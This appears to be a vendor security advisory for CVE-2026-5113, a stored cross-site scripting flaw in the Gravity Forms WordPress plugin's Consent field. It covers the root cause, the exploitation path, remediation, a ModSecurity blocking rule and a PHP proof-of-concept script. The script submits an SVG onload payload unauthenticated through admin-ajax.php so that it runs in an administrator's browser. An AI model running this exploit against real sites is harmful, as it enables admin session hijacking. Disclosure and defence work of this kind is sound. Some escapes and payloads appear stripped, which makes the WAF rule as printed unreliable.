Atomic Edge analysis of CVE-2026-5113 (metadata-based): This vulnerability affects the Gravity Forms plugin for WordPress versions up to and including 2.10.0. It allows unauthenticated attackers to perform Stored Cross-Site Scripting via the Consent field’s hidden input. The severity is high (CVSS 7.2) due to the lack of authentication required and the potential impact on administrators viewing entry data.
Root Cause: The vulnerability stems from a flawed state validation mechanism in the Consent field implementation. Based on the description, the plugin creates two hashes: one from raw user input and one from input sanitized via wp_kses(). The validation logic only fails if both hashes do not match the original state. When an attacker injects XSS payloads using tags like (which wp_kses() strips), the sanitized hash matches the original state (since wp_kses removes the malicious tag entirely), but the unsanitized raw input is preserved and stored in the database. Combined with insufficient output escaping when rendering the consent label on the Entries List page, the stored payload executes. Atomic Edge analysis confirms these conclusions are inferred from the CWE-79 classification and the detailed description, as no source code diff is available.
Exploitation: An unauthenticated attacker can exploit this by submitting a form with a Consent field. The attack vector is via the form submission AJAX endpoint (typically /wp-admin/admin-ajax.php with action ‘gform_submit’). The attacker crafts the consent field input to include a payload such as . wp_kses() removes the tag entirely (since it is not in the allowed tags list), so the sanitized hash matches the original state. However, the raw input containing the payload is saved to the database. When an administrator accesses the Gravity Forms Entries List page (e.g., /wp-admin/admin.php?page=gf_entries), the stored payload is rendered without escaping in the browser context of the administrator, leading to script execution.
Remediation: The fix (version 2.10.1) likely ensures that the raw consent label value is appropriately escaped before it is output on the Entries List page. Specifically, the plugin should use output escaping functions like esc_html() or wp_kses_post() when rendering the consent label in the admin area. Additionally, the state validation mechanism should be corrected to fail closed rather than fail open, perhaps by comparing only the sanitized hash or by storing only sanitized input. Atomic Edge analysis recommends always escaping output in admin display contexts and validating that stored data is safe for the context in which it is used.
Impact: Successful exploitation allows an unauthenticated attacker to inject arbitrary JavaScript into the WordPress admin interface. When an administrator views the affected entries, the script executes in their browser session. This can lead to session hijacking, administrative actions performed on behalf of the admin (like creating new admin users), or theft of sensitive data displayed in the admin panel. The CVSS scope change (S:C) indicates the vulnerability can affect resources beyond the vulnerable component, meaning an attacker can compromise the entire WordPress installation from the entry context.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-5113 (metadata-based)
# Blocks malicious consent field submissions exploiting the state validation bypass
# Matches form submission AJAX action and XSS payload in the consent label input
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:20265113,phase:2,deny,status:403,chain,msg:'CVE-2026-5113 - Gravity Forms Stored XSS via Consent Field',severity:'CRITICAL',tag:'CVE-2026-5113'"
SecRule ARGS_POST:action "@streq gform_submit" "chain"
SecRule ARGS_POST:/^input_d+.2$/ "@rx <[^>]*[s]*on[a-zA-Z]+[s]*=" "chain"
SecRule MATCHED_VAR "@rx <svg" "t:none"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5113 - Gravity Forms <= 2.10.0 - Unauthenticated Stored Cross-Site Scripting via Consent Field Hidden Input
/**
* This script demonstrates exploitation of CVE-2026-5113.
* It submits a Gravity Forms form with a malicious Consent field payload.
* The payload contains an SVG tag with an onload event which wp_kses() strips,
* causing the state validation to fail open and storing the payload.
* Assumptions:
* - The target WordPress site has Gravity Forms installed and activated (vulnerable version).
* - A form exists with a Consent field. The form ID is required (default: 1).
* - The form's AJAX submission endpoint is accessible without authentication.
* - The consent field ID is known (default: 1). Modify as needed.
*/
$target_url = 'https://example.com'; // Change to the target WordPress site URL
$form_id = 1; // Change to the target form ID
$consent_field_id = 1; // Change to the consent field ID in the form
// XSS payload: SVG onload (stripped by wp_kses but hash match passes)
$payload = '<svg onload=alert(1)>';
// Prepare the POST data for a Gravity Forms submission
$post_data = [
'gform_submit' => $form_id,
'gform_ajax' => 1, // Trigger AJAX submission
'input_' . $consent_field_id . '.1' => '1', // Consent checkbox value
'input_' . $consent_field_id . '.2' => $payload, // Malicious consent label
'is_submit_' . $form_id => '1',
'gform_unique_id' => '',
'state_' . $form_id => '',
'gform_target_page_number_' . $form_id => '1',
'gform_source_page_number_' . $form_id => '1',
'gform_field_values' => '',
];
// AJAX endpoint for Gravity Forms submissions
$ajax_url = rtrim($target_url, '/') . '/wp-admin/admin-ajax.php';
$post_data['action'] = 'gform_submit';
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only; remove in production
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check response
if ($http_code == 200) {
echo "[+] Form submission sent. The payload was stored.n";
echo "[+] Payload: $payloadn";
echo "[+] Admin viewing entries at " . rtrim($target_url, '/') . "/wp-admin/admin.php?page=gf_entries may trigger the XSS.n";
} else {
echo "[-] Submission failed. HTTP code: $http_coden";
}
